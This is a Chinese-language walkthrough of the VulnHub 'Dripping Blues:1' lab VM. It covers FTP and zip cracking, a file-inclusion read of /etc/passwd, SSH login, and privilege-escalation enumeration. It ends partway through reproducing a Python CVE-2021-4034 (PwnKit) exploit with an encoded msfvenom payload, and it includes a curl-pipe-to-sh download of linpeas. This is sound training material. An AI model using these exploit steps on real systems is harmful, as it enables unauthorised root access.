靶机渗透练习102-Dripping Blues:1
靶机描述
靶机地址:https://www.vulnhub.com/entry/dripping-blues-1,744/
Description
get flags
difficulty: easy
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.11.130
靶机:
IP地址:192.168.11.135
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
- Kali设置为双网卡,网卡eth0设置为仅主机模式
- 本机上将两个网卡进行桥接
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:c0:00:01 VMware, Inc.
192.168.11.135 08:00:27:67:71:e8 PCS Systemtechnik GmbH
192.168.11.254 00:50:56:fb:ca:88 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.11.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.11.0/24
方法四、fping -aqg 指定网段
fping -aqg 192.168.11.0/24
方法五、待补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# nmap -A -sV -T4 -p- 192.168.11.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 09:36 CST
Nmap scan report for 192.168.11.135
Host is up (0.00061s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.11.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:67:71:E8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.11.135
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.43 seconds
可以发现开了21、22、80端口
同时80端口下发现两个文件robots.txt、dripisreal.txt
2.2枚举漏洞
2.2.1 21端口分析
尝试匿名登录一下,发现可以无密码匿名登录上去
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# ftp 192.168.11.135
Connected to 192.168.11.135.
220 (vsFTPd 3.0.3)
Name (192.168.11.135:hirak0): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
既然登录上来了,那就看看有啥东西可以get下来的
ftp> ls -al
229 Entering Extended Passive Mode (|||10176|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Sep 19 2021 .
drwxr-xr-x 2 0 0 4096 Sep 19 2021 ..
-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip
226 Directory send OK.
ftp> get respectmydrip.zip
local: respectmydrip.zip remote: respectmydrip.zip
229 Entering Extended Passive Mode (|||9545|)
150 Opening BINARY mode data connection for respectmydrip.zip (471 bytes).
100% |***********************************| 471 4.31 MiB/s 00:00 ETA
226 Transfer complete.
471 bytes received in 00:00 (335.00 KiB/s)
ftp>
解压该压缩包发现需要密码
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# unzip respectmydrip.zip
Archive: respectmydrip.zip
[respectmydrip.zip] respectmydrip.txt password:
用zip爆破工具fcrackzip爆破一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip
PASSWORD FOUND!!!!: pw == 072528035
成功爆破出密码为072528035,解压后发现有两个文件respectmydrip.txt 和secret.zip
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# cat respectmydrip.txt
just focus on "drip"
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# unzip secret.zip
Archive: secret.zip
[secret.zip] secret.txt password:
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─#
drip暂时不知道啥用,先放着,压缩包开始套娃了,又一个压缩包需要密码
在爆破一下
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u secret.zip
可能是字典的问题,先放着,分析一下其他端口
2.2.2 22端口分析
22端口目前除了爆破,没啥特别好的方法,考验字典,以及时间
2.2.3 80端口分析
driftingblues又被黑了,所以现在叫做drippingblues。D:哈哈哈
by
travisscott & thugger
访问robots.txt、dripisreal.txt
除了dripisreal.txt,还有一个 /etc/dripispowerful.html,这个看着应该是一个绝对路径,既然是绝对路径,如果要通过url去读取该文件的内容,应该利用文件包含去读取了
翻译一下
你好,亲爱的黑客崇拜者,
看看这句歌词:
https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html
数数这n个单词,把它们并排放在一起,然后求和
即,hellohellohellohello >> md5sum hellohellohellohello
是SSH的密码
ssh密码就这样提供了?咋有种做CTF的套路呢,先放着,扫一下目录,看一下有没有其他有价值的
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# gobuster dir -u http://192.168.11.135 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.11.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: bak,txt,html,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 138]
/robots.txt (Status: 200) [Size: 78]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
没有其他发现
2.3 漏洞利用
2.3.1 文件包含漏洞利用
尝试对index.php做文件包含fuzz,这里可以使用wfuzz也可以使用Burp进行爆破枚举
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# wfuzz -c -u http://192.168.11.135/index.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21
通过wfuzz成功枚举出来了
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# wfuzz -c -u http://192.168.11.135/index.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 21
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.11.135/index.php?FUZZ=/etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000172073: 200 57 L 107 W 3032 Ch "drip"
/usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:127::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:128:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:124:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:125:130:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thugger:x:1001:1001:,,,:/home/thugger:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
mysql:x:127:133:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:128:134:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
这个可以发现用户thugger
咱们查看一下 /etc/dripispowerful.html
password is:
imdrippinbiatch
这个密码,,,目前除了ssh,80没有发现登录的表单,secret.zip也无法解压
尝试ssh的登录一下thugger:imdrippinbiatch
成功登录
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/102]
└─# ssh thugger@192.168.11.135
The authenticity of host '192.168.11.135 (192.168.11.135)' can't be established.
ED25519 key fingerprint is SHA256:eVoGERVw0lG6hbny1KztaN+fD1oHC/zhGfuexoATqME.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.11.135' (ED25519) to the list of known hosts.
thugger@192.168.11.135's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.11.0-34-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
495 updates can be installed immediately.
233 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
thugger@drippingblues:~$
2.4 权限提升
信息收集一波
thugger@drippingblues:~$ ls -al
total 64
drwxr-xr-x 14 thugger thugger 4096 Eyl 19 2021 .
drwxr-xr-x 3 root root 4096 Eyl 18 2021 ..
-rw------- 1 thugger thugger 8 Eyl 19 2021 .bash_history
drwxr-xr-x 10 thugger thugger 4096 Eyl 19 2021 .cache
drwxr-xr-x 11 thugger thugger 4096 Eyl 19 2021 .config
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Desktop
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Documents
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Downloads
drwxr-xr-x 3 thugger thugger 4096 Eyl 19 2021 .local
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Music
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Pictures
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Public
drwx------ 2 thugger thugger 4096 Eyl 19 2021 .ssh
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Templates
-r-x------ 1 thugger thugger 32 Eyl 19 2021 user.txt
drwxr-xr-x 2 thugger thugger 4096 Eyl 18 2021 Videos
thugger@drippingblues:~$ cat user.txt
5C50FC503A2ABE93B4C5EE3425496521thugger@drippingblues:~$
thugger@drippingblues:~$ cat .bash_history
su root
user.txt应该是flag1了,是一个md5值,解一下看看,toomanydrip
咱们查看一下用户可以访问的suid二进制程序
方法一 :find查找suid二进制程序
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
thugger@drippingblues:~$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 111080 Ağu 10 2021 /snap/snapd/12883/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 110792 Nis 10 2020 /snap/snapd/7264/usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 43088 Oca 8 2020 /snap/core18/1705/bin/mount
-rwsr-xr-x 1 root root 64424 Haz 28 2019 /snap/core18/1705/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/1705/bin/su
-rwsr-xr-x 1 root root 26696 Oca 8 2020 /snap/core18/1705/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/1705/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/1705/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/1705/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/1705/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/1705/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oca 31 2020 /snap/core18/1705/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Haz 10 2019 /snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/1705/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43088 Eyl 16 2020 /snap/core18/2128/bin/mount
-rwsr-xr-x 1 root root 64424 Haz 28 2019 /snap/core18/2128/bin/ping
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /snap/core18/2128/bin/su
-rwsr-xr-x 1 root root 26696 Eyl 16 2020 /snap/core18/2128/bin/umount
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /snap/core18/2128/usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /snap/core18/2128/usr/bin/chsh
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /snap/core18/2128/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /snap/core18/2128/usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /snap/core18/2128/usr/bin/passwd
-rwsr-xr-x 1 root root 149080 Oca 19 2021 /snap/core18/2128/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Haz 11 2020 /snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /snap/core18/2128/usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root dip 395144 Şub 11 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 31032 Ağu 16 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 67816 Nis 2 2020 /usr/bin/su
-rwsr-xr-x 1 root root 166056 Şub 3 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 39144 Nis 2 2020 /usr/bin/umount
-rwsr-xr-x 1 root root 14728 Mar 17 2021 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 85064 Nis 16 2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 53040 Nis 16 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 88464 Nis 16 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 68208 Nis 16 2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 39144 Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 44784 Nis 16 2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 55528 Nis 2 2020 /usr/bin/mount
-rwsr-xr-- 1 root messagebus 51344 Ara 7 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 14488 Nis 6 2020 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 22840 Ağu 16 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 130120 Nis 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14488 Tem 8 2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 473576 Tem 23 2021 /usr/lib/openssh/ssh-keysign
去https://gtfobins.github.io/查找一下
未发现可以利用的,这里有个特殊的程序/usr/lib/policykit-1/polkit-agent-helper-1
方法二:suid3num.py使用
suid3num.py原脚本链接
本地监听
python -m http.server 8888
靶机下载
wget http://192.168.11.130:8888/suid3num.py
运行一下
thugger@drippingblues:~$ wget http://192.168.11.130:8888/suid3num.py
--2024-04-03 06:13:06-- http://192.168.11.130:8888/suid3num.py
Connecting to 192.168.11.130:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16632 (16K) [text/x-python]
Saving to: ‘suid3num.py’
suid3num.py 100%[==============================================================>] 16,24K --.-KB/s in 0s
2024-04-03 06:13:06 (36,0 MB/s) - ‘suid3num.py’ saved [16632/16632]
thugger@drippingblues:~$ python3 suid3num.py
___ _ _ _ ___ _____ _ _ _ __ __
/ __| | | / | \ |__ / \| | | | | \/ |
\__ \ |_| | | |) | |_ \ .` | |_| | |\/| |
|___/\___/|_|___/ |___/_|\_|\___/|_| |_| twitter@syed__umar
[#] Finding/Listing all SUID Binaries ..
------------------------------
/snap/snapd/12883/usr/lib/snapd/snap-confine
/snap/snapd/7264/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
------------------------------
[!] Default Binaries (Don't bother)
------------------------------
/snap/snapd/12883/usr/lib/snapd/snap-confine
/snap/snapd/7264/usr/lib/snapd/snap-confine
/snap/core18/1705/bin/mount
/snap/core18/1705/bin/ping
/snap/core18/1705/bin/su
/snap/core18/1705/bin/umount
/snap/core18/1705/usr/bin/chfn
/snap/core18/1705/usr/bin/chsh
/snap/core18/1705/usr/bin/gpasswd
/snap/core18/1705/usr/bin/newgrp
/snap/core18/1705/usr/bin/passwd
/snap/core18/1705/usr/bin/sudo
/snap/core18/1705/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1705/usr/lib/openssh/ssh-keysign
/snap/core18/2128/bin/mount
/snap/core18/2128/bin/ping
/snap/core18/2128/bin/su
/snap/core18/2128/bin/umount
/snap/core18/2128/usr/bin/chfn
/snap/core18/2128/usr/bin/chsh
/snap/core18/2128/usr/bin/gpasswd
/snap/core18/2128/usr/bin/newgrp
/snap/core18/2128/usr/bin/passwd
/snap/core18/2128/usr/bin/sudo
/snap/core18/2128/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2128/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
------------------------------
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
------------------------------
[#] SUID Binaries found in GTFO bins..
------------------------------
[!] None :(
------------------------------
方法三:linpeas神器使用
先准备好最新的linpeas.sh
# From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Without curl
python -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"
python3 -c "import urllib.request; urllib.request.urlretrieve('https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh', 'linpeas.sh')"
本地监听
python -m http.server 8888
靶机下载
wget http://192.168.11.130:8888/linpeas.sh
运行一下看看
./linpeas.sh -a > linpeas.txt
查看最后结果,有不少漏洞,
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: highly probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: [ ubuntu=(20.04|21.04) ],debian=11
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
这里发现CVE-2021-4034中有涉及到前边发现的特殊程序polkit
https://blog.csdn.net/laobanjiull/article/details/122715651
突破口应该就是这个polkit了
C在kali上打包程序上传靶机执行会出现
/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found
换成python版本的测试一下
https://github.com/joeammond/CVE-2021-4034
#!/usr/bin/env python3
# CVE-2021-4034 in Python
#
# Joe Ammond (joe@ammond.org)
#
# This was just an experiment to see whether I could get this to work
# in Python, and to play around with ctypes
# This was completely cribbed from blasty's original C code:
# https://haxx.in/files/blasty-vs-pkexec.c
import base64
import os
import sys
from ctypes import *
from ctypes.util import find_library
# Payload, base64 encoded ELF shared object. Generate with:
#
# msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
#
# The PrependSetuid=true is important, without it you'll just get
# a shell as the user and not root.
#
# Should work with any msfvenom payload, tested with linux/x64/exec
# and linux/x64/shell_reverse_tcp
payload_b64 = b'''
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArwEAAAAAAADMAQAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
